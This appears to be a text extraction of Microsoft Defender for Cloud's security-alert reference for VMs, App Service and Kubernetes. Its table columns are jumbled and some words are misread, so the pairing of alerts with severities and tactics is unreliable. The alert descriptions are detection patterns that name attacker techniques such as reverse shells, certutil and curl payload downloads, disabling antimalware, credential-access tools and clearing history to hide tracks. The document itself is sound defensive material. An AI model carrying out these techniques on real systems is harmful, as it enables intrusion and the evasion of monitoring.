Attackers might disable the antimalware 
on your virtual machine to prevent 
detection. 


File excluded from your antimalware 
scanner at the same time as code was 
executed via a custom script extension 
on your virtual machine. This was 
detected by analyzing Azure Resource 
Manager operations in your subscription. 
Attackers might exclude files from the 
antimalware scan on your virtual machine 
to prevent detection while running 
unauthorized tools or infecting the 
machine with malware. 


Temporary file exclusion from 
antimalware extension in parallel to 
execution of code via custom script 
extension was detected in your virtual 
machine by analyzing the Azure Resource 
Manager operations in your subscription. 
Attackers might exclude files from the 
antimalware scan on your virtual machine 
to prevent detection while running 
arbitrary code or infecting the machine 
with malware. 


File excluded from your antimalware 
scanner on your virtual machine. This was 
detected by analyzing Azure Resource 
Manager operations in your subscription. 
Attackers might exclude files from the 
antimalware scan on your virtual machine 
to prevent detection while running 
unauthorized tools or infecting the 
machine with malware. 


Real-time protection disablement of the 
antimalware extension was detected in 


your virtual machine by analyzing the 
Azure Resource Manager operations in 
your subscription. 

Attackers might disable real-time 
protection from the antimalware scan on 
your virtual machine to avoid detection 
while running arbitrary code or infecting 
the machine with malware. 


MITRE tactics 
(Learn more) 


Defense Evasion 


Defense Evasion, 
Execution 


Defense Evasion, 
Execution 


Defense Evasion 


Defense Evasion 


Severity 


High 


Medium 


High 


High 


Medium 


Medium 


Alert (alert type) 


Antimalware real-time protection was disabled 
temporarily in your virtual machine 
(VM_AmTempRealtimeProtectionDisablement) 


Antimalware real-time protection was disabled 
temporarily while code was executed in your virtual 
machine 
(VM_AmRealtimeProtectionDisablementAndCodeExec) 


Antimalware scans blocked for files potentially 
related to malware campaigns on your virtual 
machine (Preview) 
(VM_AmMalwareCampaignRelatedExclusion) 


Antimalware temporarily disabled in your virtual 
machine 
(VM_AmTemporarilyDisablement) 


Antimalware unusual file exclusion in your virtual 
machine 
(VM_UnusualAmFileExclusion) 


Behavior similar to ransomware detected [seen 
multiple times] 


MITRE tactics 
(Learn more) 


Description 


Real-time protection temporary Defense Evasion 
disablement of the antimalware 

extension was detected in your virtual 

machine by analyzing the Azure Resource 

Manager operations in your subscription. 

Attackers might disable real-time 

protection from the antimalware scan on 

your virtual machine to avoid detection 

while running arbitrary code or infecting 

the machine with malware. 


Real-time protection temporary e 
disablement of the antimalware 


extension in parallel to code execution 
via custom script extension was detected 
in your virtual machine by analyzing the 
Azure Resource Manager operations in 
your subscription. 

Attackers might disable real-time 
protection from the antimalware scan on 
your virtual machine to avoid detection 
while running arbitrary code or infecting 
the machine with malware. 


An exclusion rule was detected in your Defense Evasion 
virtual machine to prevent your 
antimalware extension scanning certain 
files that are suspected of being related 
to a malware campaign. The rule was 
detected by analyzing the Azure 
Resource Manager operations in your 
subscription. Attackers might exclude 
files from antimalware scans to prevent 
detection while running arbitrary code or 
infecting the machine with malware. 


Antimalware temporarily disabled in your - 
virtual machine. This was detected by 

analyzing Azure Resource Manager 

operations in your subscription. 

Attackers might disable the antimalware 

on your virtual machine to prevent 

detection. 


Unusual file exclusion from antimalware Defense Evasion 


extension was detected in your virtual 
machine by analyzing the Azure Resource 
Manager operations in your subscription. 
Attackers might exclude files from the 
antimalware scan on your virtual machine 
to prevent detection while running 
arbitrary code or infecting the machine 
with malware. 


Analysis of host data on %{Compromised - 
Host} detected the execution of files that 

have resemblance of known ransomware 

that can prevent users from accessing 

their system or personal files, and 

demands ransom payment in order to 

regain access. This behavior was seen [x] 

times today on the following machines: 

[Machine names] 


Severity 


Medium 


High 


Medium 


Medium 


Medium 


High 


Alert (alert type) 


Communication with suspicious domain identified 
by threat intelligence 
(AzureDNS ThreatintelSuspectDomain) 


Container with a miner image detected 
(VM_MinerlnContainerlmage) 


Custom script extension with suspicious command in 
your virtual machine 
(VM_CustomScriptExtensionSuspiciousCmd) 


Custom script extension with suspicious entry-point 
in your virtual machine 
(VM_CustomScriptExtensionSuspiciousEntryPoint) 


Custom script extension with suspicious payload in 
your virtual machine 
(VM_CustomScriptExtensionSuspiciousPayload) 


Detected anomalous mix of upper and lower case 
characters in command line 


Detected file download from a known malicious 
source 


Description 


Communication with suspicious domain 
was detected by analyzing DNS 
transactions from your resource and 
comparing against known malicious 
domains identified by threat intelligence 
feeds. Communication to malicious 
domains is frequently performed by 
attackers and could imply that your 
resource is compromised. 


Machine logs indicate execution of a 
Docker container that runs an image 
associated with a digital currency mining. 


Custom script extension with suspicious 
command was detected in your virtual 
machine by analyzing the Azure Resource 
Manager operations in your subscription. 
Attackers may use custom script 
extension to execute a malicious code on 
your virtual machine via the Azure 
Resource Manager. 


Custom script extension with a suspicious 
entry-point was detected in your virtual 
machine by analyzing the Azure Resource 
Manager operations in your subscription. 
The entry-point refers to a suspicious 
GitHub repository. 

Attackers may use custom script 
extensions to execute malicious code on 
your virtual machines via the Azure 
Resource Manager. 


Custom script extension with a payload 
from a suspicious GitHub repository was 
detected in your virtual machine by 
analyzing the Azure Resource Manager 
operations in your subscription. 
Attackers may use custom script 
extensions to execute malicious code on 
your virtual machines via the Azure 
Resource Manager. 


Analysis of host data on %{Compromised 
Host} detected a command line with 
anomalous mix of upper and lower case 
characters. This kind of pattern, while 
possibly benign, is also typical of 
attackers trying to hide from case- 
sensitive or hash-based rule matching 
when performing administrative tasks on 
a compromised host. 


Analysis of host data has detected the 
download of a file from a known malware 
source on %{Compromised Host}. 


MITRE tactics 
(Learn more) 


Initial Access, 
Persistence, 
Execution, 
Command And 
Control, 
Exploitation 


Execution 


Execution 


Execution 


Execution 


Severity 


Medium 


High 


Medium 


Medium 


Medium 


Medium 


Medium 


Alert (alert type) Description MITRE tactics Severity 
(Learn more) 


Detected suspicious network activity Analysis of network traffic from % - Low 
{Compromised Host} detected suspicious 
network activity. Such traffic, while 
possibly benign, is typically used by an 
attacker to communicate with malicious 
servers for downloading of tools, 
command-and-control and exfiltration of 
data. Typical related attacker activity 
includes copying remote administration 
tools to a compromised host and 
exfiltrating user data from it. 


Digital currency mining related behavior detected Analysis of host data on %{Compromised - High 
Host} detected the execution of a process 
or command normally associated with 
digital currency mining. 


Disabling of auditd logging [seen multiple times] The Linux Audit system provides a way to - Low 
track security-relevant information on the 
system. It records as much information 
about the events that are happening on 
your system as possible. Disabling auditd 
logging could hamper discovering 
violations of security policies used on the 
system. This behavior was seen [x] times 
today on the following machines: 
[Machine names] 


Exploitation of Xorg vulnerability [seen multiple Analysis of host data on %{Compromised - Medium 
times] Host} detected the user of Xorg with 

suspicious arguments. Attackers may use 

this technique in privilege escalation 

attempts. This behavior was seen [x] 

times today on the following machines: 

[Machine names] 


Failed SSH brute force attack Failed brute force attacks were detected Probing Medium 
(VM_SshBruteForceFailed) from the following attackers: % 

{Attackers}. Attackers were trying to 

access the host with the following user 

names: %{Accounts used on failed sign in 

to host attempts}. 


Fileless Attack Behavior Detected The memory of the process specified Execution Low 
(VM_FilelessAttackBehavior.Linux) below contains behaviors commonly 

used by fileless attacks. 

Specific behaviors include: {list of 

observed behaviors} 


Fileless Attack Technique Detected The memory of the process specified Execution High 
(VM_FilelessAttackTechnique.Linux) below contains evidence of a fileless 

attack technique. Fileless attacks are used 

by attackers to execute code while 

evading detection by security software. 

Specific behaviors include: {list of 

observed behaviors} 


Alert (alert type) 


Fileless Attack Toolkit Detected 
(VM_FilelessAttackToolkit.Linux) 


Hidden file execution detected 


New SSH key added [seen multiple times] 
(VM_SshKeyAddition) 


New SSH key added 


Possible backdoor detected [seen multiple times] 


Possible exploitation of the mailserver detected 
(VM_MailserverExploitation ) 


Possible malicious web shell detected 


Possible password change using crypt-method 
detected [seen multiple times] 


Process associated with digital currency mining 
detected [seen multiple times] 


Process associated with digital currency mining 
detected 


Description 


The memory of the process specified 
below contains a fileless attack toolkit: 
{ToolKitName}. Fileless attack toolkits 
typically don't have a presence on the 
filesystem, making detection by 
traditional anti-virus software difficult. 
Specific behaviors include: {list of 
observed behaviors} 


Analysis of host data indicates that a 
hidden file was executed by %{user 
name}. This activity could either be 
legitimate activity, or an indication of a 
compromised host. 


A new SSH key was added to the 
authorized keys file. This behavior was 
seen [x] times today on the following 
machines: [Machine names] 


A new SSH key was added to the 
authorized keys file 


Analysis of host data has detected a 
suspicious file being downloaded then 
run on %{Compromised Host} in your 
subscription. This activity has previously 
been associated with installation of a 
backdoor. This behavior was seen [x] 
times today on the following machines: 
[Machine names] 


Analysis of host data on %{Compromised 
Host} detected an unusual execution 
under the mail server account 


Analysis of host data on %{Compromised 
Host} detected a possible web shell. 
Attackers will often upload a web shell to 
a machine they've compromised to gain 
persistence or for further exploitation. 


Analysis of host data on %{Compromised 
Host} detected password change using 
crypt method. Attackers can make this 
change to continue access and gaining 
persistence after compromise. This 
behavior was seen [x] times today on the 
following machines: [Machine names] 


Analysis of host data on %{Compromised 
Host} detected the execution of a process 


normally associated with digital currency 
mining. This behavior was seen over 100 
times today on the following machines: 
[Machine name] 


Host data analysis detected the execution 
of a process that is normally associated 
with digital currency mining. 


MITRE tactics 
(Learn more) 


Defense Evasion, 


Execution 


Persistence 


Exploitation 


Exploitation, 
Execution 


Severity 


High 


Informational 


Low 


Low 


Medium 


Medium 


Medium 


Medium 


Medium 


Medium 


Alert (alert type) 


Python encoded downloader detected [seen 
multiple times] 


Screenshot taken on host [seen multiple times] 


Shellcode detected [seen multiple times] 


Successful SSH brute force attack 
(VM_SshBruteForceSuccess) 


Suspicious Account Creation Detected 


Suspicious failed execution of custom script 
extension in your virtual machine 
(VM_CustomScriptExtensionSuspiciousFailure) 


Suspicious kernel module detected [seen multiple 
times] 


Description 


Analysis of host data on %{Compromised 
Host} detected the execution of encoded 
Python that downloads and runs code 
from a remote location. This may be an 
indication of malicious activity. This 
behavior was seen [x] times today on the 
following machines: [Machine names] 


Analysis of host data on %{Compromised 
Host} detected the user of a screen 
capture tool. Attackers may use these 
tools to access private data. This behavior 
was seen [x] times today on the following 
machines: [Machine names] 


Analysis of host data on %{Compromised 
Host} detected shellcode being 
generated from the command line. This 
process could be legitimate activity, or an 
indication that one of your machines has 
been compromised. This behavior was 
seen [x] times today on the following 
machines: [Machine names] 


Analysis of host data has detected a 
successful brute force attack. The IP % 
{Attacker source IP} was seen making 
multiple login attempts. Successful logins 
were made from that IP with the 
following user(s): %{Accounts used to 
successfully sign in to host}. This means 
that the host may be compromised and 
controlled by a malicious actor. 


Analysis of host data on %{Compromised 
Host} detected creation or use of a local 
account %{Suspicious account name} : 
this account name closely resembles a 
standard Windows account or group 
name '%{Similar To Account Name}'. This 
is potentially a rogue account created by 
an attacker, so named in order to avoid 
being noticed by a human administrator. 


Suspicious failure of a custom script 
extension was detected in your virtual 
machine by analyzing the Azure Resource 
Manager operations in your subscription. 
Such failures may be associated with 
malicious scripts run by this extension. 


Analysis of host data on %{Compromised 
Host} detected a shared object file being 
loaded as a kernel module. This could be 
legitimate activity, or an indication that 
one of your machines has been 
compromised. This behavior was seen [x] 
times today on the following machines: 
[Machine names] 


MITRE tactics 
(Learn more) 


Exploitation 


Execution 


Severity 


Low 


Low 


Medium 


High 


Medium 


Medium 


Medium 


Alert (alert type) 


Suspicious password access [seen multiple times] 


Suspicious password access 


Suspicious request to the Kubernetes Dashboard 
(VM_KubernetesDashboard) 


Unusual config reset in your virtual machine 
(VM_VMAccessUnusualConfigReset) 


Unusual deletion of custom script extension in your 
virtual machine 
(VM_CustomScriptExtensionUnusualDeletion) 


Unusual execution of custom script extension in 
your virtual machine 
(VM_CustomScriptExtensionUnusualExecution) 


Unusual user password reset in your virtual machine 
(VM_VMAccessUnusualPasswordReset) 


MITRE tactics 
(Learn more) 


Description 


Analysis of host data has detected - 
suspicious access to encrypted user 

passwords on %{Compromised Host}. 

This behavior was seen [x] times today on 

the following machines: [Machine names] 


Analysis of host data has detected - 
suspicious access to encrypted user 
passwords on %{Compromised Host}. 


Machine logs indicate that a suspicious LateralMovement 
request was made to the Kubernetes 

Dashboard. The request was sent from a 

Kubernetes node, possibly from one of 

the containers running in the node. 

Although this behavior can be 

intentional, it might indicate that the 

node is running a compromised 

container. 


An unusual config reset was detected in Credential Access 
your virtual machine by analyzing the 

Azure Resource Manager operations in 

your subscription. 

While this action may be legitimate, 

attackers can try utilizing VM Access 

extension to reset the configuration in 


your virtual machine and compromise it. 


Unusual deletion of a custom script Execution 
extension was detected in your virtual 

machine by analyzing the Azure Resource 

Manager operations in your subscription. 

Attackers may use custom script 

extensions to execute malicious code on 

your virtual machines via the Azure 


Resource Manager. 


Unusual execution of a custom script Execution 
extension was detected in your virtual 

machine by analyzing the Azure Resource 

Manager operations in your subscription. 

Attackers may use custom script 

extensions to execute malicious code on 

your virtual machines via the Azure 


Resource Manager. 


An unusual user password reset was Credential Access 
detected in your virtual machine by 

analyzing the Azure Resource Manager 

operations in your subscription. 

While this action may be legitimate, 

attackers can try utilizing the VM Access 

extension to reset the credentials of a 

local user in your virtual machine and 


compromise it. 


Severity 


Informational 


Informational 


Medium 


Medium 


Medium 


Medium 


Medium 


Alert (alert type) Description 


Unusual user SSH key reset in your virtual machine An unusual user SSH key reset was 


(VM_VMAccessUnusualSSHReset) 


MITRE tactics 


(Learn more) 


detected in your virtual machine by 


analyzing the Azure Resource Manager 
operations in your subscription. 


While this action may be legitimate, 


attackers can try utilizing VM Access 


extension to reset SSH key of a user 


account in your virtual machine and 


compromise it. 


Alerts for Azure App Service 


Further details and notes 


Alert (alert type) 


An attempt to run Linux commands on a Windows App 
Service 
(AppServices_LinuxCommandOnWindows) 


An IP that connected to your Azure App Service FTP Interface 
was found in Threat Intelligence 
(AppServices_IncomingTiClientlpFtp) 


Attempt to run high privilege command detected 
(AppServices_HighPrivilegeCommand) 


Communication with suspicious domain identified by threat 
intelligence 
(AzureDNS ThreatintelSuspectDomain) 


Description 


Analysis of App Service processes 
detected an attempt to run a Linux 
command on a Windows App Service. 
This action was running by the web 
application. This behavior is often seen 
during campaigns that exploit a 
vulnerability in a common web 
application. 

(Applies to: App Service on Windows) 


Azure App Service FTP log indicates a 
connection from a source address that 
was found in the threat intelligence feed. 
During this connection, a user accessed 
the pages listed. 

(Applies to: App Service on Windows and 
App Service on Linux) 


Analysis of App Service processes 
detected an attempt to run a command 
that requires high privileges. 

The command ran in the web application 
context. While this behavior can be 
legitimate, in web applications this 
behavior is also observed in malicious 
activities. 

(Applies to: App Service on Windows) 


Communication with suspicious domain 
was detected by analyzing DNS 
transactions from your resource and 
comparing against known malicious 
domains identified by threat intelligence 
feeds. Communication to malicious 
domains is frequently performed by 
attackers and could imply that your 
resource is compromised. 


Credential Access 


Severity 
Medium 
MITRE Severity 
tactics 
(Learn 
more) 
- Medium 
Initial Medium 
Access 
- Medium 
Initial Medium 
Access, 


Persistence, 
Execution, 
Command 

And 
Control, 
Exploitation 


Alert (alert type) 


Connection to web page from anomalous IP address detected 


(AppServices_AnomalousPageAccess) 


Dangling DNS record for an App Service resource detected 


(AppServices_DanglingDomain) 


Detected encoded executable in command line data 
(AppServices_Base64EncodedExecutablelnCommandLineParams) 


Detected file download from a known malicious source 


(AppServices_SuspectDownload) 


Detected suspicious file download 
(AppServices_SuspectDownloadArtifacts) 


Digital currency mining related behavior detected 


(AppServices_DigitalCurrencyMining) 


Description 


Azure App Service activity log indicates an 
anomalous connection to a sensitive web 
page from the listed source IP address. 
This might indicate that someone is 
attempting a brute force attack into your 
web app administration pages. It might 
also be the result of a new IP address 
being used by a legitimate user. If the 
source IP address is trusted, you can 
safely suppress this alert for this resource. 
To learn how to suppress security alerts, 
see Suppress alerts from Microsoft 
Defender for Cloud. 

(Applies to: App Service on Windows and 
App Service on Linux) 


A DNS record that points to a recently 
deleted App Service resource (also known 
as "dangling DNS" entry) has been 
detected. This leaves you susceptible to a 
subdomain takeover. Subdomain 
takeovers enable malicious actors to 
redirect traffic intended for an 
organization's domain to a site 
performing malicious activity. 

(Applies to: App Service on Windows and 
App Service on Linux) 


Analysis of host data on {Compromised 
host} detected a base-64 encoded 
executable. This has previously been 
associated with attackers attempting to 
construct executables on-the-fly through 
a sequence of commands, and attempting 
to evade intrusion detection systems by 
ensuring that no individual command 
would trigger an alert. This could be 
legitimate activity, or an indication of a 
compromised host. 

(Applies to: App Service on Windows) 


Analysis of host data has detected the 
download of a file from a known malware 
source on your host. 

(Applies to: App Service on Linux) 


Analysis of host data has detected 
suspicious download of remote file. 
(Applies to: App Service on Linux) 


Analysis of host data on Inn-Flow- 
WebJobs detected the execution of a 
process or command normally associated 
with digital currency mining. 

(Applies to: App Service on Windows and 
App Service on Linux) 


MITRE 
tactics 
(Learn 
more) 


Initial 
Access 


Defense 
Evasion, 
Execution 


Privilege 
Escalation, 
Execution, 
Exfiltration, 
Command 

and 

Control 


Persistence 


Execution 


Severity 


Low 


High 


High 


Medium 


Medium 


High 


Alert (alert type) 


Executable decoded using certutil 
(AppServices_ExecutableDecodedUsingCertutil) 


Fileless Attack Behavior Detected 
(AppServices_FilelessAttackBehaviorDetection) 


Fileless Attack Technique Detected 
(AppServices_FilelessAttackTechniqueDetection) 


Fileless Attack Toolkit Detected 
(AppServices_FilelessAttackToolkitDetection) 


Microsoft Defender for Cloud test alert for App Service (not a 
threat) 
(AppServices_EICAR) 


NMap scanning detected 
(AppServices_Nmap) 


Description 


Analysis of host data on [Compromised 
entity] detected that certutil.exe, a built-in 
administrator utility, was being used to 
decode an executable instead of its 
mainstream purpose that relates to 
manipulating certificates and certificate 
data. Attackers are known to abuse 
functionality of legitimate administrator 
tools to perform malicious actions, for 
example using a tool such as certutil.exe 
to decode a malicious executable that will 
then be subsequently executed. 

(Applies to: App Service on Windows) 


The memory of the process specified 
below contains behaviors commonly used 
by fileless attacks. 

Specific behaviors include: {list of 
observed behaviors} 

(Applies to: App Service on Windows and 
App Service on Linux) 


The memory of the process specified 
below contains evidence of a fileless 
attack technique. Fileless attacks are used 
by attackers to execute code while 
evading detection by security software. 
Specific behaviors include: {list of 
observed behaviors} 

(Applies to: App Service on Windows and 
App Service on Linux) 


The memory of the process specified 
below contains a fileless attack toolkit: 
{ToolKitName}. Fileless attack toolkits 
typically do not have a presence on the 
filesystem, making detection by 
traditional anti-virus software difficult. 
Specific behaviors include: {list of 
observed behaviors} 

(Applies to: App Service on Windows and 
App Service on Linux) 


This is a test alert generated by Microsoft 
Defender for Cloud. No further action is 
needed. 


(Applies to: App Service on Windows and 
App Service on Linux) 


Azure App Service activity log indicates a 
possible web fingerprinting activity on 
your App Service resource. 

The suspicious activity detected is 
associated with NMAP. Attackers often 
use this tool for probing the web 
application to find vulnerabilities. 
(Applies to: App Service on Windows and 
App Service on Linux) 


MITRE 
tactics 
(Learn 
more) 


Defense 
Evasion, 
Execution 


Execution 


Execution 


Defense 
Evasion, 
Execution 


PreAttack 


Severity 


High 


Medium 


High 


High 


High 


Medium 


Alert (alert type) 


Phishing content hosted on Azure Webapps 
(AppServices_PhishingContent) 


PHP file in upload folder 
(AppServices_PhpInUploadFolder) 


Possible Cryptocoinminer download detected 
(AppServices_CryptoCoinMinerDownload) 


Possible data exfiltration detected 
(AppServices_DataEgressArtifacts) 


Potential dangling DNS record for an App Service resource 
detected 
(AppServices_PotentialDanglingDomain) 


Potential reverse shell detected 
(AppServices_ReverseShell) 


Description MITRE 
tactics 


Severity 


(Learn 
more) 


URL used for phishing attack found on 
the Azure AppServices website. This URL 
was part of a phishing attack sent to 


Collection High 


Microsoft 365 customers. The content 
typically lures visitors into entering their 
corporate credentials or financial 
information into a legitimate looking 
website. 

(Applies to: App Service on Windows and 
App Service on Linux) 


Azure App Service activity log indicates an Execution Medium 
access to a suspicious PHP page located 
in the upload folder. 
This type of folder doesn't usually contain 
PHP files. The existence of this type of file 
might indicate an exploitation taking 
advantage of arbitrary file upload 
vulnerabilities. 
(Applies to: App Service on Windows and 
App Service on Linux) 
Analysis of host data has detected the Defense Medium 
download of a file normally associated Evasion, 
with digital currency mining. Command 
(Applies to: App Service on Linux) and 
Control, 

Exploitation 
Analysis of host/device data detected a Collection, | Medium 
possible data egress condition. Attackers Exfiltration 
will often egress data from machines they 
have compromised. 
(Applies to: App Service on Linux) 
A DNS record that points to a recently 7 Low 


deleted App Service resource (also known 
as "dangling DNS" entry) has been 
detected. This might leave you 
susceptible to a subdomain takeover. 
Subdomain takeovers enable malicious 
actors to redirect traffic intended for an 
organization's domain to a site 
performing malicious activity. In this case, 
a text record with the Domain Verification 
ID was found. Such text records prevent 
subdomain takeover but we still 
recommend removing the dangling 
domain. If you leave the DNS record 
pointing at the subdomain you're at risk if 
anyone in your organization deletes the 
TXT file or record in the future. 

(Applies to: App Service on Windows and 
App Service on Linux) 


Analysis of host data detected a potential Exfiltration, Medium 


reverse shell. These are used to get a Exploitation 
compromised machine to call back into a 
machine an attacker owns. 


(Applies to: App Service on Linux) 


Alert (alert type) 


Raw data download detected 
(AppServices_DownloadCodeFromWebsite) 


Saving curl output to disk detected 
(AppServices_CurlToDisk) 


Spam folder referrer detected 
(AppServices_SpamReferrer) 


Suspicious access to possibly vulnerable web page detected 


(AppServices_ScanSensitivePage) 


Suspicious domain name reference 


(AppServices_CommandlineSuspectDomain) 


Description 


Analysis of App Service processes 
detected an attempt to download code 
from raw-data websites such as Pastebin. 
This action was run by a PHP process. This 
behavior is associated with attempts to 
download web shells or other malicious 
components to the App Service. 

(Applies to: App Service on Windows) 


Analysis of App Service processes 
detected the running of a curl command 
in which the output was saved to the disk. 
While this behavior can be legitimate, in 
web applications this behavior is also 
observed in malicious activities such as 
attempts to infect websites with web 
shells. 

(Applies to: App Service on Windows) 


Azure App Service activity log indicates 
web activity that was identified as 
originating from a web site associated 
with spam activity. This can occur if your 
website is compromised and used for 
spam activity. 

(Applies to: App Service on Windows and 
App Service on Linux) 


Azure App Service activity log indicates a 
web page that seems to be sensitive was 
accessed. This suspicious activity 
originated from a source IP address 
whose access pattern resembles that of a 
web scanner. 

This activity is often associated with an 
attempt by an attacker to scan your 
network to try to gain access to sensitive 
or vulnerable web pages. 

(Applies to: App Service on Windows and 
App Service on Linux) 


Analysis of host data detected reference 
to suspicious domain name. Such activity, 
while possibly legitimate user behavior, is 
frequently an indication of the download 
or execution of malicious software. Typical 
related attacker activity is likely to include 
the download and execution of further 
malicious software or remote 
administration tools. 

(Applies to: App Service on Linux) 


MITRE 
tactics 
(Learn 
more) 


Execution 


Exfiltration 


Severity 


Medium 


Low 


Low 


Low 


Low 


Alert (alert type) 


Suspicious download using Certutil detected 
(AppServices_DownloadUsingCertutil) 


Suspicious PHP execution detected 
(AppServices_SuspectPhp) 


Suspicious PowerShell cmdlets executed 
(AppServices_PowerShellPowerSploitScriptExecution) 


Suspicious process executed 
(AppServices_KnownCredential AccessTools) 


Suspicious process name detected 
(AppServices_ProcessWithKnownSuspiciousExtension) 


Suspicious SVCHOST process executed 
(AppServices_SVCHostFromInvalidPath) 


Description 


Analysis of host data on {NAME} detected 
the use of certutil.exe, a built-in 
administrator utility, for the download of 
a binary instead of its mainstream 
purpose that relates to manipulating 
certificates and certificate data. Attackers 
are known to abuse functionality of 
legitimate administrator tools to perform 
malicious actions, for example using 
certutil.exe to download and decode a 


malicious executable that will then be 
subsequently executed. 
(Applies to: App Service on Windows) 


Machine logs indicate that a suspicious 
PHP process is running. The action 
included an attempt to run operating 
system commands or PHP code from the 
command line, by using the PHP process. 
While this behavior can be legitimate, in 
web applications this behavior might 
indicate malicious activities, such as 
attempts to infect websites with web 
shells. 

(Applies to: App Service on Windows and 
App Service on Linux) 


Analysis of host data indicates execution 
of known malicious PowerShell 
PowerSploit cmdlets. 

(Applies to: App Service on Windows) 


Machine logs indicate that the suspicious 
process: '%{process path}' was running on 
the machine, often associated with 
attacker attempts to access credentials. 
(Applies to: App Service on Windows) 


Analysis of host data on {NAME} detected 
a process whose name is suspicious, for 
example corresponding to a known 
attacker tool or named in a way that is 
suggestive of attacker tools that try to 
hide in plain sight. This process could be 
legitimate activity, or an indication that 
one of your machines has been 
compromised. 

(Applies to: App Service on Windows) 


The system process SVCHOST was 
observed running in an abnormal context. 
Malware often use SVCHOST to mask its 
malicious activity. 

(Applies to: App Service on Windows) 


MITRE 
tactics 
(Learn 
more) 


Execution 


Execution 


Execution 


Credential 
Access 


Persistence, 
Defense 
Evasion 


Defense 
Evasion, 
Execution 


Severity 


Medium 


Medium 


Medium 


High 


Medium 


High 


Alert (alert type) 


Suspicious User Agent detected 
(AppServices_UserAgentlnjection) 


Suspicious WordPress theme invocation detected 
(AppServices_WpThemelnjection) 


Vulnerability scanner detected 
(AppServices_DrupalScanner) 


Vulnerability scanner detected 
(AppServices_JoomlaScanner) 


Description MITRE 
tactics 
(Learn 
more) 


Azure App Service activity log indicates Initial 
requests with suspicious user agent. This Access 
behavior can indicate on attempts to 

exploit a vulnerability in your App Service 

application. 

(Applies to: App Service on Windows and 

App Service on Linux) 


Azure App Service activity log indicates a Execution 
possible code injection activity on your 
App Service resource. 

The suspicious activity detected 
resembles that of a manipulation of 
WordPress theme to support server side 
execution of code, followed by a direct 
web request to invoke the manipulated 
theme file. 

This type of activity was seen in the past 
as part of an attack campaign over 
WordPress. 

If your App Service resource isn't hosting 
a WordPress site, it isn't vulnerable to this 
specific code injection exploit and you can 
safely suppress this alert for the resource. 
To learn how to suppress security alerts, 
see Suppress alerts from Microsoft 
Defender for Cloud. 

(Applies to: App Service on Windows and 
App Service on Linux) 


Azure App Service activity log indicates PreAttack 
that a possible vulnerability scanner was 
used on your App Service resource. 

The suspicious activity detected 

resembles that of tools targeting a 
content management system (CMS). 

If your App Service resource isn't hosting 
a Drupal site, it isn't vulnerable to this 
specific code injection exploit and you can 
safely suppress this alert for the resource. 
To learn how to suppress security alerts, 
see Suppress alerts from Microsoft 
Defender for Cloud. 

(Applies to: App Service on Windows) 


Azure App Service activity log indicates PreAttack 
that a possible vulnerability scanner was 
used on your App Service resource. 

The suspicious activity detected 

resembles that of tools targeting Joomla 
applications. 

If your App Service resource isn't hosting 
a Joomla site, it isn't vulnerable to this 
specific code injection exploit and you can 
safely suppress this alert for the resource. 
To learn how to suppress security alerts, 
see Suppress alerts from Microsoft 
Defender for Cloud. 

(Applies to: App Service on Windows and 
App Service on Linux) 


Severity 


Medium 


High 


Low 


Low 


Alert (alert type) Description MITRE Severity 
tactics 
(Learn 
more) 


Vulnerability scanner detected Azure App Service activity log indicates PreAttack Low 
(AppServices_WpScanner) that a possible vulnerability scanner was 
used on your App Service resource. 
The suspicious activity detected 
resembles that of tools targeting 
WordPress applications. 
If your App Service resource isn't hosting 
a WordPress site, it isn't vulnerable to this 
specific code injection exploit and you can 
safely suppress this alert for the resource. 
To learn how to suppress security alerts, 
see Suppress alerts from Microsoft 
Defender for Cloud. 
(Applies to: App Service on Windows and 
App Service on Linux) 


Web fingerprinting detected Azure App Service activity log indicates a PreAttack Medium 
(AppServices_WebFingerprinting) possible web fingerprinting activity on 

your App Service resource. 

The suspicious activity detected is 

associated with a tool called Blind 

Elephant. The tool fingerprint web servers 

and tries to detect the installed 

applications and version. 

Attackers often use this tool for probing 

the web application to find vulnerabilities. 


(Applies to: App Service on Windows and 
App Service on Linux) 


Website is tagged as malicious in threat intelligence feed Your website as described below is Collection Medium 
(AppServices_SmartScreen) marked as a malicious site by Windows 

SmartScreen. If you think this is a false 

positive, contact Windows SmartScreen 

via report feedback link provided. 

(Applies to: App Service on Windows and 

App Service on Linux) 


Alerts for containers - Kubernetes clusters 


Microsoft Defender for Containers provides security alerts on the cluster level and on the underlying cluster nodes by 
monitoring both control plane (API server) and the containerized workload itself. Control plane security alerts can be 
recognized by a prefix of Kss_ of the alert type. Security alerts for runtime workload in the clusters can be recognized by 


the K8S.NODE_ prefix of the alert type. All alerts are supported on Linux only, unless otherwise indicated. 
Further details and notes 


Alert (alert type) Description MITRE tactics Severity 
(Learn more) 


Exposed Postgres service with trust authentication Kubernetes cluster configuration InitialAccess Medium 
configuration in Kubernetes detected (Preview) analysis detected exposure of a 
(K8S_ExposedPostgresTrustAuth) Postgres service by a load balancer. 


The service is configured with trust 
authentication method, which 
doesn't require credentials. 


Alert (alert type) 


Exposed Postgres service with risky configuration in 
Kubernetes detected (Preview) 
(K8S_ExposedPostgresBroad|PRange) 


Attempt to create a new Linux namespace from a 
container detected 
(K8S.NODE_NamespaceCreation) 1 


A history file has been cleared 
(K8S.NODE_HistoryFileCleared) ! 


Abnormal activity of managed identity associated 
with Kubernetes (Preview) 
(K8S_AbnormalMiActivity) 


Abnormal Kubernetes service account operation 
detected 
(K8S_ServiceAccountRareOperation) 


An uncommon connection attempt detected 
(K8S.NODE_SuspectConnection) 1 


Description 


Kubernetes cluster configuration 
analysis detected exposure of a 
Postgres service by a load balancer 
with a risky configuration. Exposing 
the service to a wide range of IP 
addresses poses a security risk. 


Analysis of processes running within 
a container in Kubernetes cluster 
detected an attempt to create a new 
Linux namespace. While this behavior 
might be legitimate, it might indicate 
that an attacker tries to escape from 
the container to the node. Some 
CVE-2022-0185 exploitations use this 
technique. 


Analysis of processes running within 
a container or directly ona 
Kubernetes node, has detected that 
the command history log file has 
been cleared. Attackers may do this 
to cover their tracks. The operation 
was performed by the specified user 
account. 


Analysis of Azure Resource Manager 
operations detected an abnormal 
behavior of a managed identity used 
by an AKS addon. The detected 
activity isn't consistent with the 
behavior of the associated addon. 
While this activity can be legitimate, 
such behavior might indicate that the 
identity was gained by an attacker, 
possibly from a compromised 
container in the Kubernetes cluster. 


Kubernetes audit log analysis 
detected abnormal behavior by a 
service account in your Kubernetes 
cluster. The service account was used 
for an operation, which isn't common 
for this service account. While this 
activity can be legitimate, such 
behavior might indicate that the 
service account is being used for 
malicious purposes. 


Analysis of processes running within 
a container or directly ona 
Kubernetes node, has detected an 
uncommon connection attempt 
utilizing a socks protocol. This is very 
rare in normal operations, but a 
known technique for attackers 
attempting to bypass network-layer 
detections. 


MITRE tactics 
(Learn more) 


